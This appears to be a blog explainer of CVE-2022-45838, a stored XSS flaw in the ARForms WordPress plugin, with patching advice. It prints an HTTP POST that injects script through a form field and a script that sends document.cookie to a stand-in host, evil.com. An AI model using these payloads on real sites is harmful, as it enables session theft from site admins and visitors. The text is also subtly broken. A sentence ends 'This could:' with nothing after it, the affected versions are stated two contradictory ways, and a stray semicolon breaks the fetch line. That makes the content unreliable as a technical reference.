CVE-2022-45838 - How ARForms Form Builder Plugin <= 1.5.5 Can Be Tricked With Simple Stored XSS (And How To Stay Safe)

The internet is loaded with websites powered by WordPress, and if you've used forms on your site, maybe you've heard about the "ARForms Form Builder" plugin by Repute InfoSystems. It's a popular tool to collect user data, build polls, take feedback, and more—super handy, right? But if you were running version 1.5.5 or below in late 2022, you were open to a sneaky little attack called Stored Cross-Site Scripting—also known as "Stored XSS."

Let’s break down what happened with CVE-2022-45838, how bad actors could use it to cause disruptions, and what you should do about it, all with examples you can actually understand.

CVE-2022-45838 describes an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability

- Affected Plugin: ARForms Form Builder by Repute InfoSystems

Vulnerable Versions: Up to and including 1.5.5

In plain English: Hackers could submit malicious JavaScript code via forms on any site using this plugin (before version 1.5.5), and that code would sit on your site and run in the browsers of anyone who viewed those forms or form entries—without even needing to log in.

What is Stored XSS?

XSS is like leaving a note with a prank message in a public place, and every person who reads the note sees the prank in action. With "stored" XSS, the bad code gets _saved_ (or stored) in your database, and shown to every visitor who stumbles across it.

Unauthenticated means the attacker doesn’t even need a login—if you had a form public anywhere, anyone could use it.

Step 1: Identify The Form

The ARForms plugin lets you create custom forms with all sorts of fields—text inputs, emails, comments, whatever. Some versions missed out on properly cleaning up the user input (a process called "sanitizing"). This means anything entered in some fields just went straight to storage, and then got spit back out directly on the site.

Step 2: Enter Evil JavaScript

Suppose a site had a public registration or feedback form set up with ARForms. An attacker could craft their input like:

<script>alert('XSS!')</script>

and submit it via the form’s “name” or “comments” field.

Step 3: Wait For The Victim

Later, when an admin checks the form submissions, or if entries were shown somewhere on the public site (like recent testimonials), the browser would actually run the attacker's code. This could:

Let’s look at a code snippet simulating what an attacker might do

POST /wp-admin/admin-ajax.php?action=arf_submit HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

field_name=<script>alert(document.cookie)</script>&field_email=hacker@evil.com

Now, on the admin page where entries are displayed, any admin will see an alert box—_but it could be way worse than that_:

// Instead of just an alert, an attacker could use:
<script>
  fetch('https://evil.com/stealcookies?c='; + document.cookie);
</script>

That code would send your WordPress cookies to the attacker.

Original References

- WPScan Security Advisory
- NVD - CVE-2022-45838
- PluginChangelogs

How To Protect Your Site

Update The Plugin Immediately:  
Repute InfoSystems released a fix after version 1.5.5. Visit your WordPress dashboard, and if you have ARForms installed, update to the latest version right away!

Conclusion

CVE-2022-45838 wasn’t just a technical blip—it was a dangerous mistake that could hurt your website, your reputation, and your users. Remember: running outdated plugins is asking for trouble!

Always stay updated and regularly check your plugins for security issues. Want to know more? Check out the official WPScan ARForms Report and keep your WordPress site safe and sound.

Timeline

Published on: 04/18/2023 13:15:00 UTC
Last modified on: 04/26/2023 17:09:00 UTC